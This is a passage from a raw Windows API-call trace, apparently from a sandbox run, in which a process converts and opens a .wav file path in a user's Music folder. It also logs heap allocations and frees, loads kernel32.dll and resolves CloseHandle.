HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav", cchWideChar=93, lpMultiByteStr=0x9a5d78, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav", lpUsedDefaultChar=0x0) returned 93 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.235] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\s1qr7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=93, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xba) returned 0x9c3540 [0186.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=93, lpWideCharStr=0x9c3540, cchWideChar=93 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav") returned 93 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.239] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.241] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0186.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0186.242] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.243] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.244] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0186.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd648, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0186.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.244] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0186.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.245] CloseHandle (hObject=0x120) returned 1 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.246] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 